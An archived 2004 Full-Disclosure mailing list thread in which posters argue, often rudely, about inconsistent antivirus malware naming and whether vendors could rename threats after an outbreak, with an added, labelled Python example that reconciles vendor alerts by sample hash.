Mailing List Archive: Full Disclosure: Full-Disclosure

(no subject)



kf_lists at secnetops

Aug 13, 2004, 4:04 PM

Post #101 of 180 (2712 views)
Permalink
Re: (no subject) (try using a friggin subject line...) [In reply to]

Insert subject here --------------------^

-KF

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Valdis.Kletnieks at vt

Aug 13, 2004, 5:52 PM

Post #102 of 180 (2711 views)
Permalink
Re: (no subject) [In reply to]

On Fri, 13 Aug 2004 21:17:44 +0200, Maarten said:

> The only thing Todd (and I) are trying to say is that it is possible to rename
> after the fact. I don't #!%$&* care how many old Cobol programs need
> adapting for that to "get" possible, but the fact remains that it IS.

The question is *in fact* what ROI the companies get for modifying all that
old Cobol. "Possible" and "worth doing" are two different things...

> Don't start again about how your current procedures may prevent or complicate
> that. Worse integration problems, by far more complex and bigger companies
> or conglomerates are being tackled every day. Yeah. To name a few ?

Note that here the ROI is pretty easy - you fix the compatibility or the company
goes under.

> How about mergers, or international intelligence-exchange between law
> enforcement agencies. Do you think that they let anyone stop them by
> complaining that database format X isn't readily compatible with format Y ?
> No. They fix it, they make it work together no matter what.

Actually, that isn't always the case.

http://www.publicintegrity.org/report.aspx?aid=332&sid=100

Yes, a database so borked that copying it could break it.

> So don't start about how impossible it is for you to rename one simple entry.

It's not a question of being *impossible*. But if it costs them US$750K to do it,
and the expected return is under US$750K, why should they do it?

Hell, we're talking about an industry which as a whole *continues* to keep
spewing out 'We removed a virus/worm' warnings to known not-at-fault addresses
- presumably the (probably very low) cost of ceasing to do so is
counterbalanced by the advertising benefit of the spam. If they won't do *THAT*
little thing that's *obviously* in the public interest, why should they change
the way they name stuff, at probably higher cost, and less obvious benefit?


fulldisc at ultratux

Aug 13, 2004, 6:35 PM

Post #103 of 180 (2706 views)
Permalink
Re: (no subject) [In reply to]

On Saturday 14 August 2004 02:52, Valdis.Kletnieks [at] vt wrote:
> On Fri, 13 Aug 2004 21:17:44 +0200, Maarten said:
> > The only thing Todd (and I) are trying to say is that it is possible to
> > rename after the fact. I don't #!%$&* care how many old Cobol programs
> > need adapting for that to "get" possible, but the fact remains that it
> > IS.
>
> The question is *in fact* what ROI the companies get for modifying all that
> old Cobol. "Possible" and "worth doing" are two different things...

Oh definitely. I do not contest that. But these posts saying "not possible"
from a technical / logistical standpoint started to irritate me...
But sure, until there is an economic reason for change, there won't be.

> > How about mergers, or international intelligence-exchange between law
> > enforcement agencies. Do you think that they let anyone stop them by
> > complaining that database format X isn't readily compatible with format Y
> > ? No. They fix it, they make it work together no matter what.
>
> Actually, that isn't always the case.
>
> http://www.publicintegrity.org/report.aspx?aid=332&sid=100
>
> Yes, a database so borked that copying it could break it.

Hahaha. Great link, thanks... Although this may happen, it sounds to me like
a political issue rather than a technical one. When you can retrieve data
you can copy it (by whatever [inefficient] means is irrelevant now).

> Hell, we're talking about an industry which as a whole *continues* to keep
> spewing out 'We removed a virus/worm' warnings to known not-at-fault
> addresses - presumably the (probably very low) cost of ceasing to do so is
> counterbalanced by the advertising benefit of the spam. If they won't do
> *THAT* little thing that's *obviously* in the public interest, why should
> they change the way they name stuff, at probably higher cost, and less
> obvious benefit?

Hear hear...!
Good point.

Maarten

--
Yes of course I'm sure it's the red cable. I guarante[^%!/+)F#0c|'NO CARRIER



nick at virus-l

Aug 14, 2004, 12:14 AM

Post #104 of 180 (2701 views)
Permalink
RE: (no subject) [In reply to]

Brad Griffin wrote:

<<big snip>>
> I can't understand how the Google research is a problem with naming
> conventions. Google for a virus name and multiple hits come up, mostly
> for descriptions on a/v sites that also carry the alias names in most
> cases.

The "problem" with such "Google research" (or with using VGrep) is that
it is too much "after the event".

As I keep saying, and as admins everywhere keep agreeing with me, the
biggest part of the naming inconsistency problem occurs in the first
few hours of an outbreak (or suspected outbreak) event. Neither Google
nor VGrep can help you then...

Some AV developers have taken more care to list the names they know
their competitors are using by the time they post a web description of
a new virus, and some make the effort to update that list for the hours
or days following an outbreak, at least for "high interest" viruses, but
that is only a partial solution to the problem.


--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854



adam at huntrecruiting

Aug 14, 2004, 7:35 PM

Post #105 of 180 (2703 views)
Permalink
Re: (no subject) (try using a friggin subject line...) [In reply to]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


who are you friggen Dr Evil?

On Friday 13 August 2004 07:04 pm, KF_lists wrote:
> Insert subject here --------------------^
>
> -KF
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBHsvzQEDQWvlbVLkRAls1AJ9il79zClgYJinxFJrZFILdbw6v7QCeLhQa
12Xv/+oYjPxty8GdJmRqGHw=
=kKb6
-----END PGP SIGNATURE-----



adam at huntrecruiting

Aug 14, 2004, 7:35 PM

Post #106 of 180 (2693 views)
Permalink
Re: (no subject) (try using a friggin subject line...) [In reply to]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


who are you friggen Dr Evil?

On Friday 13 August 2004 07:04 pm, KF_lists wrote:
> Insert subject here --------------------^
>
> -KF
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFBHsvzQEDQWvlbVLkRAls1AJ9il79zClgYJinxFJrZFILdbw6v7QCeLhQa
12Xv/+oYjPxty8GdJmRqGHw=
=kKb6
-----END PGP SIGNATURE-----



nick at virus-l

Aug 14, 2004, 7:52 PM

Post #107 of 180 (2710 views)
Permalink
Re: (no subject) [In reply to]

Maarten wrote:

> First off: Nick, please lose that damn attitude of yours !

Why?

You're clearly ignorant of what you are talking about, yet you speak
with an air as if you do know something about the topic. Further, your
ignorance would have been cured by carefully reading all of the
foregoing thread. There's a point where the idiocy and chutzpah that
several have shown in this thread makes them no longer worthy of polite
consideration and at that point I usually adopt the "beat it into them
in case that helps" approach...

> Further, by hammering on the endless we-have-done-it-for-many-years-so-who
> are-you-to-tell-us-differently part you're actually making yourself part of
> the problem, not part of the solution.

You show more and more of your ignorance each time you open your mouth.

_If_ this "problem" is ever solved, it is very likely that I will have
been a not insignificant part of that solution. I can't prove that to
you but it is "just one of those things" and probably undeniable to
anyone who knows what they are talking about when discussing this
problem.

> You're saying that internal procedures make it so difficult to adapt names
> after the fact. When in fact the strength of a company, any company, IS to
> be able to adapt to changing circumstances.
> And if they're not able to, eventually they will go the way of the dinosaurs.

You are confusing two different aspects of the AV industry. Yes, the
industry has to be quite flexible and able to quickly react to
significant shifts in the malware detection problem set. That does not
mean it has to be equally flexible (or even "flexible in the tiniest
little bit") when it comes to malware naming, as the last 15 years of
commercial AV software development, marketing and sales prove. Your
suggestion is found wanting in the light of significant history -- care
to make some more obviously uninformed comments??

> The only thing Todd (and I) are trying to say is that it is possible to rename
> after the fact. ...

Of course it is.

I never denied that.

I have, however, pointed out several reasons why that generally doesn't
happen, why that situation is very unlikely to change _AND_ why it
would not be particularly helpful even if it did change. In response
to those explanations you and Todd (and some others) just keep dumbly
repeating "but they should change".

Something we both agree on.

The difference is that in designing a better naming system, I am not
limited to parroting stupid inanities about things I don't understand
-- I can analyse the history in multi-layered and interacting terms of
the industry's technical, economic and political development, its
current internal culture, place that in larger market and political
contexts, and as a result make useful suggestions that are much more
likely to be adopted inside the industry and that mean the industry can
change to better suit those external factors. I can also advise those
"outside" AV what elements of those environments they may best and most
easily change to increase the likelihood the AV industry will make
"suitable" changes.

I await your parrot squawk response...

NOT!

> ... I don't #!%$&* care how many old Cobol programs need
> adapting for that to "get" possible, but the fact remains that it IS.

_Theoretically_, yes.

I have now lost track of how many times I have agreed with you (and
others) on this now.

The larger and much more salient fact is that, in today's market (and
everything that has gone before it), there is no compelling reason for
several of the very large players to make the expenditure and introduce
the huge upheavals to internal processes (that are clearly working
because these companies have not gone the way of the dinosaurs and, to
the contrary, are experiencing some of their strongest growth ever)
that fixing the naming problem will require.

> Don't start again about how your current procedures may prevent or complicate
> that. Worse integration problems, by far more complex and bigger companies
> or conglomerates are being tackled every day. Yeah. To name a few ?
> How about mergers, or international intelligence-exchange between law
> enforcement agencies. Do you think that they let anyone stop them by
> complaining that database format X isn't readily compatible with format Y ?
> No. They fix it, they make it work together no matter what.
> So don't start about how impossible it is for you to rename one simple entry.

Both your belief in, and your abject inability to see, your own
ignorance are truly astonishing!

As Valdis (?) has already addressed the most egregious flaws of your
"logic" here, I'll move on to other, more AV-specific issues.

> To conclude, I'd like to put serious question marks by your statement that the
> first few hours are the all-important ones. First off, by renaming after the
> fact (after the first few hours/days/weeks) no-one is changing ANYTHING about
> those first hours so you shouldn't have ANY complaint regarding that.

Huh???

What _are_ you trying to say?

The first few hours _under current processes_ produce nearly all of the
confusion caused by naming inconsistencies. Media outlets latch onto
the multiple names (though some will only report one of these, at least
initially). System admins get multiple reports and warnings of new
outbreaks and have to work out whether the updates from the three (or
more) different AV suppliers whose products they use all cover "all" of
the new viruses (which may only be one, but the admins don't know yet).
Then, after the initial hubbub dies down, the way all the foregoing
works produces a (modest to significant) negative pressure on the AV
companies to change the name reported by their scanner -- they have
sent out alerts to system admins with their initial name and as
confusing as it was at the time that this was not the same name as some
of the competition used the admins of their scanners have become
somewhat familiar with that name, the major news agencies all included
that company's name for the malware in their reports so folk will come
looking for that name at their web site, and so on. Those everyday
(well, every incident) negative pressures for name change further
reduce any perceived ROI of changing the processes that would allow for
much greater naming flexibility (when viewed as a business issue,
rather than as a theoretical or technical one).

> Secondly, a lot of the confusion only comes later. The guys that have their AV
> software up and running and current mostly do not suffer from the outbreaks.
> The problem often comes (much) later, with the people who didn't update,
> 'forgot to', or plain disregard any security or updates whatsoever. And then
> you are only called in to fix things when stuff is really breaking down.
> Or are you saying you've never been asked to de-toxify your parents'-,
> friends'- or siblings'- computers that got infested despite everything ?
> Everyone has.

I did not say that there were not downstream problems as a result of
not renaming. I said the majority of the cost (as a business factor)
of naming inconsistency occurs in the first few hours of an "outbreak"
situation, either directly (e.g. the sysadmins rushing round trying to
work out if the three alerts from three different vendors in the last
15 minutes for FooBar.AB, FooBar.AC and FooBar.AD are, in fact, just
different names for one virus or two or three new variants they then
have to ensure all their products get updated to detect ASAP) or
indirectly (the media reports start to be written as the developers
post alerts to sysadmins, and these promulgate _and preserve_ further
confusion based on the mish-mash of names from early in an outbreak,
and worse, can add their own cutesy, media-coined names to further mess
things up).

Those are the reasons why renaming after the event will not
significantly reduce the costs and complications of naming confusion.

Before you respond Maarten, please re-read the whole thread again to
see how many times this has already been explained... (Note that I
consider this and the parallel thread on naming conventions to be part
of the same thread.)

> Oh and P.S.: Yes, I did read all of the threads pertaining to this.

It's a pity you didn't understand what you read then, as you have
presented no good arguments against the points I have now made several
times, and mostly you simply regurgitate the clue-free comments that
you have already made.

I am now very tired of repeating myself and having you and some others
fail to grasp the slightest bit of what I have been explaining. If all
you do is repeat yourself again I shall most likely just ignore you, as
I have better things to do with my time than beat my head against the
block wall of your ignorance.


--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854

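Nick's post #104 (Google and VGrep are "after the event") and the FooBar.AB / FooBar.AC / FooBar.AD scenario in post #107 both describe the same operational problem: three alerts arrive within minutes, and the admin has to decide whether they are one new variant or three. The following is an added example, not code from the thread or from any AV vendor, and it makes one assumption the thread does not: that each vendor alert can be tied to a hash of the sample it was raised on. A name-to-name cross-reference such as VGrep maps names to other names and is only as current as its last update; keying on the sample instead lets the admin reconcile the names they actually received, today, without waiting for anyone's alias list. The alert records below are constructed test data, and the vendor and name strings are placeholders.

```python
"""Reconcile multi-vendor malware alerts by sample identity instead of by name.

Added example (not from the Full-Disclosure thread). Assumption: every alert
carries the SHA-256 of the sample the vendor alerted on. Vendor names and
detection names below are constructed placeholders, not real products.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Alert:
    vendor: str   # which scanner raised the alert
    name: str     # that vendor's detection name (their naming convention)
    sha256: str   # hash of the sample the alert was raised on (assumed available)


# Constructed sample alerts: three vendors, three different names, but only
# two distinct samples. VendorA and VendorB alerted on the same file.
SAMPLE_ALERTS = [
    Alert("VendorA", "FooBar.AB", "aa" * 32),
    Alert("VendorB", "FooBar.AC", "aa" * 32),
    Alert("VendorC", "FooBar.AD", "bb" * 32),
]


def group_by_sample(alerts):
    """Map each sample hash to {vendor: name}.

    Every name that lands under the same hash is, by construction, an alias
    for the same sample, regardless of what the vendors chose to call it.
    """
    groups = defaultdict(dict)
    for a in alerts:
        groups[a.sha256][a.vendor] = a.name
    return dict(groups)


def distinct_variants(alerts):
    """How many actually different samples the alerts refer to."""
    return len(group_by_sample(alerts))


def aliases_of(alerts, vendor, name):
    """Other vendors' names seen on the same sample(s) as (vendor, name).

    Returns a sorted list of (vendor, name) tuples, excluding the query itself.
    """
    hashes = {a.sha256 for a in alerts if a.vendor == vendor and a.name == name}
    return sorted(
        {(a.vendor, a.name) for a in alerts
         if a.sha256 in hashes and not (a.vendor == vendor and a.name == name)}
    )


def coverage_gaps(alerts, deployed_vendors):
    """For each sample, which deployed scanners have NOT yet alerted on it.

    This is the admin's real question during the first hours: do all of my
    products detect this yet, whatever they each call it?
    """
    groups = group_by_sample(alerts)
    return {h: sorted(set(deployed_vendors) - set(seen)) for h, seen in groups.items()}


def report(alerts, deployed_vendors):
    """Human-readable summary, one line per distinct sample."""
    lines = []
    for h, seen in group_by_sample(alerts).items():
        names = ", ".join(f"{v}:{n}" for v, n in sorted(seen.items()))
        missing = coverage_gaps(alerts, deployed_vendors)[h]
        gap = f"  NOT YET DETECTED BY: {', '.join(missing)}" if missing else "  fully covered"
        lines.append(f"{h[:16]}...  {names}{gap}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_ALERTS, ["VendorA", "VendorB", "VendorC"]))
```

The obvious caveat is the one Nick raises: in the first hours of an outbreak the alert often arrives before the admin has a sample in hand, and a vendor's alert page does not always state a hash. When it does not, the hash column is empty, the grouping degrades to one group per alert, and you are back to the name-only confusion the thread describes; the script does not pretend otherwise.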


list at geeksamazing

Aug 14, 2004, 11:15 PM

Post #108 of 180 (2716 views)
Permalink
Re: (no subject) [In reply to]

Nick et al...

After having really suffered through the thread(s), what is missing is:

Most SysAdmins do not know what it takes to run a business.

Most Business Administrators do not know what it takes to run a
network.

With that said Maarten will never understand the Business Point that you
are making, nor will most other SysAdmins.

The bottom line is, no matter how many "technical" people would like it, or
how much it would actually make sense AND make everyone's lives easier, the
bean counters prevent it: there is no profit.


At 02:52 PM 8/15/2004 +1200, Nick FitzGerald wrote:
>Maarten wrote:
>
> > First off: Nick, please lose that damn attitude of yours !
>
>Why?
>
>You're clearly ignorant of what you are talking about, yet you speak
>with an air as if you do know something about the topic. Further, your
>ignorance would have been cured by carefully reading all of the
>foregoing thread. There's a point where the idiocy and chutzpah that
>several have shown in this thread makes them no longer worthy of polite
>consideration and at that point I usually adopt the "beat it into them
>in case that helps" approach...
>
> > Further, by hammering on the endless we-have-done-it-for-many-years-so-who
> > are-you-to-tell-us-differently part you're actually making yourself
> part of
> > the problem, not part of the solution.
>
>You show more and more of your ignorance each time you open your mouth.
>
>_If_ this "problem" is ever solved, it is very likely that I will have
>been a not insignificant part of that solution. I can't prove that to
>you but it is "just one of those things" and probably undeniable to
>anyone who knows what they are talking about when discussing this
>problem.
>
> > You're saying that internal procedures make it so difficult to adapt names
> > after the fact. When in fact the strength of a company, any company,
> IS to
> > be able to adapt to changing circumstances.
> > And if they're not able to, eventually they will go the way of the
> dinosaurs.
>
>You are confusing two different aspects of the AV industry. Yes, the
>industry has to be quite flexible and able to quickly react to
>significant shifts in the malware detection problem set. That does not
>mean it has to be equally flexible (or even "flexible in the tiniest
>little bit") when it comes to malware naming, as the last 15 years of
>commercial AV software development, marketing and sales prove. Your
>suggestion is found wanting in the light of significant history -- care
>to make some more obviously uninformed comments??
>
> > The only thing Todd (and I) are trying to say is that it is possible to
> rename
> > after the fact. ...
>
>Of course it is.
>
>I never denied that.
>
>I have, however, pointed out several reasons why that generally doesn't
>happen, why that situation is very unlikely to change _AND_ why it
>would not be particularly helpful even if it did change. In response
>to those explanations you and Todd (and some others) just keep dumbly
>repeating "but they should change".
>
>Something we both agree on.
>
>The difference is that in designing a better naming system, I am not
>limited to parroting stupid inanities about things I don't understand
>-- I can analyse the history in multi-layered and interacting terms of
>the industry's technical, economic and political development, its
>current internal culture, place that in larger market and political
>contexts, and as a result make useful suggestions that are much more
>likely to be adopted inside the industry and that mean the industry can
>change to better suit those external factors. I can also advise those
>"outside" AV what elements of those environments they may best and most
>easily change to increase the likelihood the AV industry will make
>"suitable" changes.
>
>I await your parrot squawk response...
>
>NOT!
>
> > ... I don't #!%$&* care how many old Cobol programs need
> > adapting for that to "get" possible, but the fact remains that it IS.
>
>_Theoretically_, yes.
>
>I have now lost track of how many times I have agreed with you (and
>others) on this now.
>
>The larger and much more salient fact is that, in today's market (and
>everything that has gone before it), there is no compelling reason for
>several of the very large players to make the expenditure and introduce
>the huge upheavals to internal processes (that are clearly working
>because these companies have not gone the way of the dinosaurs and, to
>the contrary, are experiencing some of their strongest growth ever)
>that fixing the naming problem will require.
>
> > Don't start again about how your current procedures may prevent or
> complicate
> > that. Worse integration problems, by far more complex and bigger
> companies
> > or conglomerates are being tackled every day. Yeah. To name a few ?
> > How about mergers, or international intelligence-exchange between law
> > enforcement agencies. Do you think that they let anyone stop them by
> > complaining that database format X isn't readily compatible with format
> Y ?
> > No. They fix it, they make it work together no matter what.
> > So don't start about how impossible it is for you to rename one simple
> entry.
>
>Both your belief in, and your abject inability to see, your own
>ignorance are truly astonishing!
>
>As Valdis (?) has already addressed the most egregious flaws of your
>"logic" here, I'll move on to other, more AV-specific issues.
>
> > To conclude, I'd like to put serious question marks by your statement
> that the
> > first few hours are the all-important ones. First off, by renaming
> after the
> > fact (after the first few hours/days/weeks) no-one is changing ANYTHING
> about
> > those first hours so you shouldn't have ANY complaint regarding that.
>
>Huh???
>
>What _are_ you trying to say?
>
>The first few hours _under current processes_ produce nearly all of the
>confusion caused by naming inconsistencies. Media outlets latch onto
>the multiple names (though some will only report one of these, at least
>initially). System admins get multiple reports and warnings of new
>outbreaks and have to work out whether the updates from the three (or
>more) different AV suppliers whose products they use all cover "all" of
>the new viruses (which may only be one, but the admins don't know yet).
>Then, after the initial hubbub dies down, the way all the foregoing
>works produces a (modest to significant) negative pressure on the AV
>companies to change the name reported by their scanner -- they have
>sent out alerts to system admins with their initial name and as
>confusing as it was at the time that this was not the same name as some
>of the competition used the admins of their scanners have become
>somewhat familiar with that name, the major news agencies all included
>that company's name for the malware in their reports so folk will come
>looking for that name at their web site, and so on. Those everyday
>(well, every incident) negative pressures for name change further
>reduce any perceived ROI of changing the processes that would allow for
>much greater naming flexibility (when viewed as a business issue,
>rather than as a theoretical or technical one).
>
> > Secondly, a lot of the confusion only comes later. The guys that have
> their AV
> > software up and running and current mostly do not suffer from the
> outbreaks.
> > The problem often comes (much) later, with the people who didn't update,
> > 'forgot to', or plain disregard any security or updates
> whatsoever. And then
> > you are only called in to fix things when stuff is really breaking down.
> > Or are you saying you've never been asked to de-toxify your parents'-,
> > friends'- or siblings'- computers that got infested despite everything ?
> > Everyone has.
>
>I did not say that there were not downstream problems as a result of
>not renaming. I said the majority of the cost (as a business factor)
>of naming inconsistency occurs in the first few hours of an "outbreak"
>situation, either directly (e.g. the sysadmins rushing round trying to
>work out if the three alerts from three different vendors in the last
>15 minutes for FooBar.AB, FooBar.AC and FooBar.AD are, in fact, just
>different names for one virus or two or three new variants they then
>have to ensure all their products get updated to detect ASAP) or
>indirectly (the media reports start to be written as the developers
>post alerts to sysadmins, and these promulgate _and preserve_ further
>confusion based on the mish-mash of names from early in an outbreak,
>and worse, can add their own cutesy, media-coined names to further mess
>things up).
>
>Those are the reasons why renaming after the event will not
>significantly reduce the costs and complications of naming confusion.
>
>Before you respond Maarten, please re-read the whole thread again to
>see how many times this has already been explained... (Note that I
>consider this and the parallel thread on naming conventions to be part
>of the same thread.)
>
> > Oh and P.S.: Yes, I did read all of the threads pertaining to this.
>
>It's a pity you didn't understand what you read then, as you have
>presented no good arguments against the points I have now made several
>times, and mostly you simply regurgitate the clue-free comments that
>you have already made.
>
>I am now very tired of repeating myself and having you and some others
>fail to grasp the slightest bit of what I have been explaining. If all
>you do is repeat yourself again I shall most likely just ignore you, as
>I have better things to do with my time than beat my head against the
>block wall of your ignorance.
>
>
>--
>Nick FitzGerald
>Computer Virus Consulting Ltd.
>Ph/FAX: +64 3 3529854
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.netsys.com/full-disclosure-charter.html




fulldisc at ultratux

Aug 15, 2004, 4:52 AM

Post #109 of 180 (2725 views)
Permalink
Re: (no subject) [In reply to]

On Sunday 15 August 2004 04:52, Nick FitzGerald wrote:
> Maarten wrote:
> > First off: Nick, please lose that damn attitude of yours !
>
> Why?

Because you're being rude, and anti-social. You don't score points with this.
Jeez why do I even HAVE to explain things like this. SO typical.

> You're clearly ignorant of what you are talking about, yet you speak
> with an air as if you do know something about the topic. Further, your
> ignorance would have been cured by carefully reading all of the
> foregoing thread. There's a point where the idiocy and chutzpah that
> several have shown in this thread makes them no longer worthy of polite
> consideration and at that point I usually adopt the "beat it into them
> in case that helps" approach...

Yada yada. You may work in the industry (and be blind because of it) and I
may have an incredibly high IQ (so much higher than yours that you perceive
I'm stupid instead).
But the thing is, you don't know that. So stop bashing me and showing off.
You can shine by your actions, not by your reputation...

> > Further, by hammering on the endless
> > we-have-done-it-for-many-years-so-who are-you-to-tell-us-differently part
> > you're actually making yourself part of the problem, not part of the
> > solution.
>
> You show more and more of your ignorance each time you open your mouth.

You ARE part of the problem ! You leave no opportunity unused to bash
opponents instead of using solid arguments.

> _If_ this "problem" is ever solved, it is very likely that I will have
> been a not insignificant part of that solution. I can't prove that to
> you but it is "just one of those things" and probably undeniable to
> anyone who knows what they are talking about when discussing this
> problem.

Which coincidentally, by your own admission, would be only you.
So you're effectively saying: "I will probably agree with myself."
Well, whoopty-doo... big surprise there.

> > You're saying that internal procedures make it so difficult to adapt
> > names after the fact. When in fact the strength of a company, any
> > company, IS to be able to adapt to changing circumstances.
> > And if they're not able to, eventually they will go the way of the
> > dinosaurs.
>
> You are confusing two different aspects of the AV industry. Yes, the
> industry has to be quite flexible and able to quickly react to
> significant shifts in the malware detection problem set. That does not
> mean it has to be equally flexible (or even "flexible in the tiniest
> little bit") when it comes to malware naming, as the last 15 years of
> commercial AV software development, marketing and sales prove. Your
> suggestion is found wanting in the light of significant history -- care
> to make some more obviously uninformed comments??

I'm not confusing anything. The statement about needing to be flexible
applies to ALL companies, on ALL aspects. It is stupid to think that a
company can be inflexible in one thing while being flexible in another.

> > The only thing Todd (and I) are trying to say is that it is possible to
> > rename after the fact. ...
>
> Of course it is.
>
> I never denied that.

Yes, you did.

> I have, however, pointed out several reasons why that generally doesn't
> happen, why that situation is very unlikely to change _AND_ why it
> would not be particularly helpful even if it did change. In response
> to those explanations you and Todd (and some others) just keep dumbly
> repeating "but they should change".
>
> Something we both agree on.
>
> The difference is that in designing a better naming system, I am not
> limited to parroting stupid inanities about things I don't understand
> -- I can analyse the history in multi-layered and interacting terms of
> the industry's technical, economic and political development, its
> current internal culture, place that in larger market and political
> contexts, and as a result make useful suggestions that are much more
> likely to be adopted inside the industry and that mean the industry can
> change to better suit those external factors. I can also advise those
> "outside" AV what elements of those environments they may best and most
> easily change to increase the likelihood the AV industry will make
> "suitable" changes.

No, you're a shining example of being too close to your subject to have an
impartial and unclouded view.

> I await your parrot squawk response...
>
> NOT!

I'm happy to say I don't care whether you await it or not.

> > ... I don't #!%$&* care how many old Cobol programs need
> > adapting for that to "get" possible, but the fact remains that it IS.
>
> _Theoretically_, yes.
>
> I have now lost track of how many times I have agreed with you (and
> others) on this now.
>
> The larger and much more salient fact is that, in today's market (and
> everything that has gone before it), there is no compelling reason for
> several of the very large players to make the expenditure and introduce
> the huge upheavals to internal processes (that are clearly working
> because these companies have not gone the way of the dinosaurs and, to
> the contrary, are experiencing some of their strongest growth ever)
> that fixing the naming problem will require.

All change starts small. Maybe discussions such as this will wake people up,
maybe there will even be a voiced demand from the public. That DOES hurt
sales, thus shareholders, which is what you need to have done, right ?
The only thing I'm sure about is, YOU will not be instrumental in this.

> > Don't start again about how your current procedures may prevent or
> > complicate that. Worse integration problems, by far more complex and
> > bigger companies or conglomerates are being tackled every day. Yeah. To
> > name a few ? How about mergers, or international intelligence-exchange
> > between law enforcement agencies. Do you think that they let anyone stop
> > them by complaining that database format X isn't readily compatible with
> > format Y ? No. They fix it, they make it work together no matter what.
> > So don't start about how impossible it is for you to rename one simple
> > entry.
>
> Both your belief in, and your abject inability to see, your own
> ignorance are truly astonishing!

Saying someone is ignorant without proving that only makes yourself look
stupid.

> As Valdis (?) has already addressed the most egregious flaws of your
> "logic" here, I'll move on other, more AV-specific issues.

Valdis only mentioned economics. We agree on the economic situation.
But you're not focussing on that AT ALL. You are saying there are technical
reasons not to. Like the next point, which I'll -sigh- explain to you again.

> > To conclude, I'd like to put serious question marks by your statement
> > that the first few hours are the all-important ones. First off, by
> > renaming after the fact (after the first few hours/days/weeks) no-one is
> > changing ANYTHING about those first hours so you shouldn't have ANY
> > complaint regarding that.
>
> Huh???
>
> What _are_ you trying to say?

Well, just for you, to make it simple.
At Time T you find a virus and name it whatever you like (just as you do now).
From time T until T+48h you have the "all-important hours" of confusion as
you are so adamant to repeat at every opportunity. So let there be confusion.
At Time T+50 you agree upon a singular standardized name and rename it.

So, compared to now, what has changed between T and T+48 ?? Nothing. So stop
complaining about me messing up those "all-important hours" of yours. I'm
not messing anything up. I'm renaming when the panic has died down.
Get it now ?!?!

>
> The first few hours _under current processes_ produce nearly all of the
> confusion caused by naming inconsistencies. Media outlets latch onto

This is not a scientific fact, and I do not agree with you.

> the multiple names (though some will only report one of these, at least
> initially). System admins get multiple reports and warnings of new
> outbreaks and have to work out whether the updates from the three (or
> more) different AV suppliers whose products they use all cover "all" of
> the new viruses (which may only be one, but the admins don't know yet).
> Then, after the initial hub-bub dies down, the way all the foregoing
> works produces a (modest to significant) negative pressure on the AV
> companies to change the name reported by their scanner -- they have
> sent out alerts to system admins with their initial name and as
> confusing as it was at the time that this was not the same name as some
> of the competition used the admins of their scanners have become
> somewhat familiar with that name, the major news agencies all included
> that company's name for the malware in their reports so folk will come
> looking for that name at their web site, and so on. Those everyday
> (well, every incident) negative pressures for name change further
> reduce any perceived ROI of changing the processes that would allow for
> much greater naming flexibility (when viewed as a business issue,
> rather than as a theoretical or technical one).

Are you thick ? Of course they will not "further reduce" that. If anything,
increase it. Negative press hurts the bottom line, or does your special
universe work differently ?

> > Secondly, a lot of the confusion only comes later. The guys that have
> > their AV software up and running and current mostly do not suffer from
> > the outbreaks. The problem often comes (much) later, with the people who
> > didn't update, 'forgot to', or plain disregard any security or updates
> > whatsoever. And then you are only called in to fix things when stuff is
> > really breaking down. Or are you saying you've never been asked to
> > de-toxify your parents'-, friends'- or siblings'- computers that got
> > infested despite everything ? Everyone has.
>
> I did not say that there were not downstream problems as a result of
> not renaming. I said the majority of the cost (as a business factor)
> of naming inconsistency occurs in the first few hours of an "outbreak"
> situation, either directly (e.g. the sysadmins rushing round trying to
> work out if the three alerts from three different vendors in the last
> 15 minutes for FooBar.AB, FooBar.AC and FooBar.AD are, in fact, just
> different names for one virus or two or three new variants they then
> have to ensure all their products get updated to detect ASAP) or
> indirectly (the media reports start to be written as the developers
> post alerts to sysadmins, and these promulgate _and preserve_ further
> confusion based on the mish-mash of names from early in an outbreak,
> and worse, can add their own cutesy, media-coined names to further mess
> things up).

This comes at a significant cost to the AV company too: when not renaming,
they still have to compare their viruses found to all the competitors' ones,
if only to be able to update their description pages.

But there is another glaring hole in your whole approach. On the one hand you
say that those early hours are the problem, yet you keep saying you're
categorically refusing to tackle that, in earlier posts. So are you part of
the problem, or not ?

> Those are the reasons why renaming after the event will not
> significantly reduce the costs and complications of naming confusion.
>
> Before you respond Maarten, please re-read the whole thread again to
> see how many times this has already been explained... (Note that I
> consider this and the parallel thread on naming conventions to be part
> of the same thread.)

I do too. Please get it into your thick head that it IS conceivable that
someone not agreeing with you != someone is wrong. The world doesn't
revolve around you and your views, you know.

> > Oh and P.S.: Yes, I did read all of the threads pertaining to this.
>
> It's a pity you didn't understand what you read then, as you have
> presented no good arguments against the points I have now made several
> times, and mostly you simply regurgitate the clue-free comments that
> you have already made.

If there is someone who's endlessly repeating himself, it is you.

> I am now very tired of repeating myself and having you and some others
> fail to grasp the slightest bit of what I have been explaining. If all
> you do is repeat yourself again I shall most likely just ignore you, as
> I have better things to do with my time than beat my head against the
> block wall of your ignorance.

Funny, I thought the exact same thing myself. So we'll probably stop this
discussion that is going nowhere anyway. Have a nice life in the AV
research industry. And when (not if, when) the time comes that y'all DO
agree on fixing the naming problem, maybe you'll think of me for a second.
Okay ?

Maarten

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


lists at michel-messerschmidt

Aug 16, 2004, 3:50 AM

Post #110 of 180 (2720 views)
Re: (no subject) [In reply to]

On Sun, Aug 15, 2004 at 01:52:33PM +0200, Maarten wrote:
> On Sunday 15 August 2004 04:52, Nick FitzGerald wrote:
> > Maarten wrote:
> yada yada. You may work in the industry (and be blind because of it) and I
> may have an incredible high IQ (so much higher than yours that you perceive
> I'm stupid instead).
